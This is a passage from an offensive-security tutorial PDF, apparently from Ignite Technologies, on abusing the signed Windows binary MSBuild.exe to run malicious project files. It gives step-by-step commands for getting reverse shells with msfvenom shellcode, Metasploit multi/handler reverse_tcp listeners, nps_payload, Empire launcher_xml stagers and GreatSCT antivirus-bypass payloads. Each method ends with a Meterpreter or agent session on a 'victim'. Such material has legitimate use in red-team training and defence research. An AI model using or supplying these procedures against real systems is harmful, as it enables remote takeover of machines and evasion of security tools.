Windows Exploitation - Msbuild PDF
Page 2 of 17
Introduction to MSBuild.exe
The Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild,
provides an XML schema for a project file that controls how the build platform processes and builds
software. Visual Studio uses MSBuild, but MSBuild does not depend on Visual Studio: by invoking
msbuild.exe on a project or solution file, you can organise and build products in environments where
Visual Studio is not installed. This is what makes it interesting to an attacker: MSBuild.exe ships with
the .NET Framework and is a Microsoft-signed binary, so running code through it is a trusted-developer-utility
proxy execution technique (MITRE ATT&CK T1127.001) rather than dropping a custom executable.
Visual Studio uses MSBuild to load and build managed projects. The project files in Visual Studio
(.csproj, .vbproj, .vcxproj, and others) contain MSBuild XML code.
Exploitation Techniques:
Generate C# File with Msfvenom
A C# project created in Microsoft Visual Studio is saved as a *.csproj file in MSBuild format so that the
MSBuild platform can compile it into an executable program. With a malicious project file, we can obtain a
reverse shell from the victim's machine. We will now generate our file.csproj; first generate C# shellcode with
msfvenom (its csharp output format), then place that shellcode inside file.csproj as shown below.
The shellcode generated above is placed in an XML project file, which you can download from GitHub; it
contains the code that MSBuild compiles and executes. This XML file should be saved as file.csproj and run
via MSBuild to get a Meterpreter session.
Note: replace the shellcode value with your own C# shellcode and rename buf to shellcode, as shown in the
image below.
cat file.csproj
You can run MSBuild from Visual Studio or from the command line. Using Visual Studio, you can compile an
application to run on any one of several versions of the .NET Framework.
For example, you can compile an application to run on the .NET Framework 2.0 on a 32-bit platform, and
compile the same application to run on the .NET Framework 4.5 on a 64-bit platform. The ability to compile
for more than one framework is called multitargeting.
To learn more about MSBuild, see:
https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2015
Now launch multi/handler to get a Meterpreter session, and run file.csproj with MSBuild.exe from the target
path C:\Windows\Microsoft.NET\Framework\v4.0.30319 as shown.
Note: the malicious project file (XML / csproj) is saved in that directory here so that the bare file name
resolves from the current directory; MSBuild accepts a project file from any path, so a full path works too:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.csproj
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.109
set lport 1234
exploit
sysinfo
As you can observe, we have obtained a Meterpreter session on the victim, as shown below:
Generate XML File to Exploit MSBuild
As mentioned above, MSBuild uses an XML-based project file format that is straightforward and extensible,
and MSBuild does not require any particular extension on a project file passed on the command line, so we can
rename the generated file.csproj to file.xml and run file.xml with msbuild.exe from the target path
C:\Windows\Microsoft.Net\Framework\v4.0.30319 as shown.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.xml
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.109
set lport 1234
exploit
sysinfo
As you can observe, we have obtained a Meterpreter session on the victim, as shown below:
Nps_Payload Script
This script generates payloads for basic intrusion detection avoidance. It utilises publicly demonstrated
techniques from several different sources. Larry Spohn (@Spoonman1091) wrote the script; Ben Mauch
(@Ben0xA), aka dirty_ben, created the payload. You can download it from GitHub.
nps_payload generates payloads that can be executed with msbuild.exe or mshta.exe to obtain a reverse
connection from the victim's machine as a Meterpreter session.
1. Run the ./nps_payload.py script once you have downloaded nps_payload from GitHub.
2. Press key 1 to select the task "generate msbuild/nps/msf".
3. Press key 1 again to select the payload "windows/meterpreter/reverse_tcp".
This generates the payload as an XML file. Copy this file to the target location
C:\Windows\Microsoft.Net\Framework\v4.0.30319 as in the previous method and, at the same time, run the
command below in a new terminal to start the listener from the resource file the script wrote:
msfconsole -r msbuild_nps.rc
Now repeat the step above to execute msbuild_nps.xml from the command prompt and obtain a reverse
connection via Meterpreter as shown below:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe msbuild_nps.xml
PowerShell Empire
For our next method of MSBuild attack, we will use Empire. Empire is a post-exploitation framework. Until
now we have paired our XML attacks with Metasploit, but in this method we will use the Empire framework.
It is a pure Python framework driving a PowerShell-based Windows agent, which makes it quite useful. Empire
was developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can
download this framework here.
For a basic guide to Empire, please see our article introducing Empire:
https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/
Once the Empire framework is started, type listeners to check whether there are any active listeners. As you
can see in the image below, there are none, so set up a listener by typing:
listeners
uselistener http
set Host http://192.168.1.107
execute
With the above commands, you will have an active listener. Type back to leave the listener menu so that you
can create the stager.
For our MSBuild attack we will use a stager. A stager, in Empire, is a snippet of code that launches the agent
on the compromised host and connects it back to the listener. For this, type:
usestager windows/launcher_xml
set Listener http
execute
usestager creates a malicious project file, saved in /tmp as "launcher.xml".
Once the file runs, we will have the result on our listener. Run the file on the victim machine by typing the
following commands:
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml
To see whether we have any open sessions, type "agents". This shows the name of the session you have. To
access that session, type:
interact A8H14C7L
sysinfo
GreatSCT
GreatSCT is a tool that lets you use Metasploit payloads while bypassing most anti-virus products. GreatSCT
is currently maintained by @ConsciousHacker. You can download it from here:
https://github.com/GreatSCT/GreatSCT
Once it is downloaded and running, type the following command to access the modules:
use Bypass
Now, to see the list of payloads, type:
list
From the list of payloads you can choose any one for your desired attack. For this attack we will use:
use msbuild/meterpreter/rev_tcp.py
Once the command is executed, type:
While generating the payload, it will ask you for a name for the payload. By default, it uses "payload" as the
name. We have given msbuild as the payload name, so the output code is saved as msbuild.xml.
Now it has produced two files: a Metasploit resource (rc) file and msbuild.xml. First, start Python's HTTP
server in /usr/share/greatsct-output/source so that the target can fetch msbuild.xml from it, by typing (on
Python 3 the equivalent is python3 -m http.server 80):
python -m SimpleHTTPServer 80
Then, on the target, with msbuild.xml downloaded from that server into the MSBuild directory, run:
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe msbuild.xml
At the same time, start multi/handler using the resource file. For this, type:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
Reference: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2017
www.ignitetechnologies.in